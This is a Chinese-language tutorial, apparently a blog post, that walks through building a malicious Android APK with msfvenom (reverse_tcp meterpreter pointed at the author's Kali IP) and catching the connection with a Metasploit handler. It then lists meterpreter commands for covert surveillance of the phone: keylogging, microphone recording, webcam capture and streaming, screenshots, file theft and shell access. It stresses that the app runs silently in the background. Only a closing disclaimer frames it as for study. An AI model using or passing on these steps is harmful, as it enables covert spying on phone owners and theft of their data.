这期是kali使用MSF进行安卓渗透的保姆级别教程,话不多说,直接开始。
准备材料:
1.装有kali的实体机或虚拟机(这里用实体机进行演示)
2.一台安卓10.0以下的手机
打开kali,先用ifconfig查看自己的kali IP地址:
kali查看IP
图中,wlan0上的192.168.2.247就是我的IP地址,记住你自己的。
然后,我们打开kali已root的终端,在上面输入以下代码,生成安装包,注意端口一定是没有用的,IP为你自己kali的IP地址:
msfvenom -p android/meterpreter/reverse_tcp LHOST=你的kali ip lport=没有占用的端口 R >自定义名称.apk
eg:
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.2.247 lport=30094 R >and.apk
生成后效果如图 :
现在准备工作做完了,我们下一步运行msfconsole
在root终端输入msfconsole运行,程序加载完后就会出现msf6 >(不好意思,忘了截图了),这时我们输入以下代码选择程序:
use exploit/multi/handler如图:
然后我们输入以下代码选择攻击模块:
set payload android/meterpreter/reverse_tcp如图:
下面设置本地ip:
set LHOST 本地ip
ip设置
设置端口:
set lport 你选择的端口
敲黑板:上面的ip和端口早在建立安装包就设置好了,不知道的去看第二步!
我们键入
show options 来查看配置情况:
万事俱备,我们输入run来启动程序,输入完成后在手机上点击刚才我们装好的应用,注意,点开应用后不会有任何反应,但应用已经进入后台运行,不必重复打开!
注意这一步最关键,主机和手机必须在同一局域网下,连接成功后如图:
连接成功如图
有很多人在这一步失败了,要么没反应,要么代码乱窜个不停,那就是网络或手机的问题。
现在我们输入一个指令,让手机打开一个应用:
app_run 应用名称应用名称就是上面com.开头的那个,不是汉语拼音!
视频效果:
打开应用
还可以使用:
webcam_snap命令拍照。
还可以使用
play wav路径命令播放wav音频。
视频效果:
wav文件播放
更多命令输入help查看。
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
温馨提示:
遵纪守法,如出现各种法律问题与作者无关,技术没有好坏,关键是看你怎么使用,本文章仅供学习与交流使用,转载须标明出处,如有不足请大佬指出,感谢观看!
